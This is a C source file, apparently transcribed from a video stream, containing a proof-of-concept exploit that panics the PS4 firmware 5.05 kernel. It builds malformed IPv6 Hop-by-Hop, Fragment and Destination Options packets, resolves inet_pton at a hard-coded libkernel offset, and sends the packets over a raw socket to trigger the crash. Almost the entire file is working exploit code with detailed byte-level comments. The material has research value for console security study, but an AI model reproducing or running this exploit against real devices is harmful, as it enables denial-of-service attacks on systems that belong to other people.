Transcription to C of Specter's video stream, in which he codes a PS4 FW 5.05 kernel-panic PoC based on TheFloW's IP6_EXTHDR_CHECK XNU PoC.
/* Socket/protocol constants for the target's (BSD-style) kernel ABI.
 * They are hard-coded because the payload is built without the target's
 * headers; the numbers must match the PS4 kernel, not the build host
 * (Linux, for example, numbers AF_INET6 differently). The IPPROTO_* values
 * are the IANA protocol numbers. IP6F_MORE_FRAG is written as 0x100, i.e.
 * the value already byte-swapped for a little-endian host, because the code
 * below stores it with a host-order write2 -- TODO(review): confirm against
 * the SDK header before reusing this on another target. */
#define AF_INET6 28          /* address family: IPv6 */
#define SOCK_RAW 3           /* raw socket: caller supplies the extension headers */
#define IPPROTO_HOPOPTS 0    /* Hop-by-Hop Options header */
#define IPPROTO_IPV6 41      /* IPv6 (unused in this listing) */
#define IPPROTO_FRAGMENT 44  /* Fragment header */
#define IPPROTO_ICMPV6 58    /* ICMPv6 */
#define IPPROTO_DSTOPTS 60   /* Destination Options header */
#define IPPROTO_RAW 255      /* raw IP (unused in this listing) */
#define IP6OPT_PADN 1        /* PadN option type (type byte, length byte, N pad bytes) */
#define IP6F_MORE_FRAG 0x100 /* "more fragments" flag, pre-swapped for little-endian (see above) */
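/* Fill len bytes at buf with a repeating 32-bit pattern through the SDK's
 * write4 helper (len is assumed to be a multiple of 4, as both callers are). */
static void fill_pattern(uint64_t buf, int len, uint32_t pattern) {
    for (int i = 0; i < len; i += 4) {
        write4(buf + i, pattern);
    }
}

/*
 * Kernel-panic PoC against the target's IPv6 extension-header parsing.
 *
 * It opens a raw AF_INET6 socket with protocol IPPROTO_HOPOPTS, so the
 * bytes passed to sendto() are presumably interpreted as a Hop-by-Hop
 * options header followed by the rest of the extension-header chain
 * (the kernel prepends the fixed IPv6 header). Two payloads go to ::1:
 *   packet1: Hop-by-Hop -> Fragment (id 0x1337, "more fragments" set)
 *            -> Destination Options whose length byte (1, i.e. (1+1)*8 =
 *            16 bytes) exceeds the 8 bytes actually present in the buffer;
 *   packet2: Hop-by-Hop -> Fragment (id 0x1337, last fragment, offset
 *            field 0x800) -> 24 bytes that continue the option data.
 * The author marks the second send as the trigger. Why this chain panics
 * the kernel is not explained in the transcription; consult the referenced
 * IP6_EXTHDR_CHECK write-up rather than this comment.
 *
 * Environment assumptions (not portable): memory is touched through the
 * SDK's write1/write2/write4 helpers, syscalls go through
 * libkernel_sys_socket/libkernel_sys_sendto, wait() is the SDK delay helper
 * (presumably microseconds -- confirm), and inet_pton is resolved at a
 * hard-coded offset in the 5.05 libkernel (libkernel_base + 0x11250), so the
 * function only matches that firmware.
 *
 * Byte order: the 16-bit fragment offset/flags field is stored with write2
 * in host order. IP6F_MORE_FRAG (0x100) and the 0x800 offset value are the
 * pre-swapped constants BSD-style headers use on little-endian hosts, so on
 * an x86-64 target they land on the wire as 0x0001 (offset 0, M set) and
 * 0x0008 (offset 1, M clear). TODO(review): confirm before reusing.
 *
 * Fixes relative to the transcription: the sockaddr_in6 is zeroed before it
 * is filled in (malloc does not zero, so sin6_flowinfo/sin6_scope_id were
 * heap garbage), socket/malloc/inet_pton/first-send failures abort instead
 * of sending the trigger anyway, the invalid "%I" conversion in the final
 * printf is corrected to "%i", and the buffers are freed on the non-panic
 * paths. The socket is not closed: no close helper is in scope here.
 *
 * Returns nothing. On success the target kernel is expected to panic, so
 * the trailing cleanup only matters when a step fails.
 */
static void try_df_kpanic(void) {
    enum { ADDR_LEN = 0x1C, PKT1_LEN = 0x18, PKT2_LEN = 0x28 };
    uint64_t addr = 0;
    uint64_t packet1 = 0;
    uint64_t packet2 = 0;

    printf("Your PS4 will have a kernel panic soon...");

    int sock = libkernel_sys_socket(AF_INET6, SOCK_RAW, IPPROTO_HOPOPTS);
    printf("sock = %i", sock);
    if (sock < 0) {
        return; /* nothing allocated yet */
    }

    /* Destination [::1]:0 as a BSD-layout struct sockaddr_in6:
     *   0x00 sin6_len, 0x01 sin6_family, 0x02 sin6_port, 0x04 sin6_flowinfo,
     *   0x08 sin6_addr, 0x18 sin6_scope_id
     * (layout implied by the original offsets -- confirm against the SDK
     * header). Zero the whole struct first so the fields this code does not
     * set are 0 instead of whatever malloc hands back. */
    addr = (uint64_t)malloc(ADDR_LEN);
    if (!addr) {
        goto out;
    }
    for (int i = 0; i < ADDR_LEN; i += 4) {
        write4(addr + i, 0);
    }
    write1(addr + 0x01, AF_INET6); /* sin6_family */
    write2(addr + 0x02, 0);        /* sin6_port */

    /* inet_pton is not linked directly; resolve it at its 5.05 libkernel offset. */
    int (*inet_pton)(int af, const char *restrict src, void *restrict dst) =
        (int (*)(int, const char *restrict, void *restrict))(libkernel_base + 0x11250);
    if (inet_pton(AF_INET6, "::1", (void *)(addr + 0x08)) != 1) { /* sin6_addr */
        goto out;
    }

    /* packet1: first fragment. Bytes not explicitly set keep the 0x41 fill. */
    packet1 = (uint64_t)malloc(PKT1_LEN);
    if (!packet1) {
        goto out;
    }
    fill_pattern(packet1, PKT1_LEN, 0x41414141);
    /* 0x00: Hop-by-Hop Options header, 8 bytes (ext len 0) */
    write1(packet1 + 0x00, IPPROTO_FRAGMENT); /* next header */
    write1(packet1 + 0x01, 0);                /* hdr ext len */
    write1(packet1 + 0x02, IP6OPT_PADN);      /* PadN option with 4 data bytes */
    write1(packet1 + 0x03, 4);                /* -> fills the remaining 6 bytes */
    /* 0x08: Fragment header */
    write1(packet1 + 0x08, IPPROTO_DSTOPTS);  /* next header */
    write1(packet1 + 0x09, 0);                /* reserved */
    write2(packet1 + 0x0A, IP6F_MORE_FRAG);   /* offset 0, M set (see byte-order note) */
    write4(packet1 + 0x0C, 0x1337);           /* identification */
    /* 0x10: Destination Options header; claims 16 bytes, only 8 are in the buffer */
    write1(packet1 + 0x10, IPPROTO_ICMPV6);   /* next header */
    write1(packet1 + 0x11, 1);                /* hdr ext len: (1+1)*8 = 16 bytes */
    write1(packet1 + 0x12, IP6OPT_PADN);
    write1(packet1 + 0x13, 4);

    /* packet2: last fragment with the same id. Bytes not set keep the 0x42 fill. */
    packet2 = (uint64_t)malloc(PKT2_LEN);
    if (!packet2) {
        goto out;
    }
    fill_pattern(packet2, PKT2_LEN, 0x42424242);
    /* 0x00: Hop-by-Hop Options header, identical to packet1 */
    write1(packet2 + 0x00, IPPROTO_FRAGMENT);
    write1(packet2 + 0x01, 0);
    write1(packet2 + 0x02, IP6OPT_PADN);
    write1(packet2 + 0x03, 4);
    /* 0x08: Fragment header */
    write1(packet2 + 0x08, IPPROTO_DSTOPTS);
    write1(packet2 + 0x09, 0);
    write2(packet2 + 0x0A, 0x800);            /* offset 1, M clear (see byte-order note) */
    write4(packet2 + 0x0C, 0x1337);           /* same id -> reassembled with packet1 */
    /* 0x10: fragment payload, continues the Destination Options data */
    write1(packet2 + 0x10, IP6OPT_PADN);
    write1(packet2 + 0x11, 6);

    int rv1 = libkernel_sys_sendto(sock, (void *)packet1, PKT1_LEN, 0,
                                   (sockaddr *)addr, ADDR_LEN);
    printf("rv1 = %i", rv1);
    if (rv1 < 0) {
        goto out; /* no fragment state on the target; the trigger would be pointless */
    }

    wait(3 * 1000 * 1000); /* SDK delay helper; presumably 3 s in microseconds */

    /* Trigger kernel panic */
    int rv2 = libkernel_sys_sendto(sock, (void *)packet2, PKT2_LEN, 0,
                                   (sockaddr *)addr, ADDR_LEN);
    printf("rv2 = %i", rv2); /* original had "%I", which is not a printf conversion */

out:
    /* Only reached when a step failed or the target did not panic. */
    free((void *)packet2);
    free((void *)packet1);
    free((void *)addr);
}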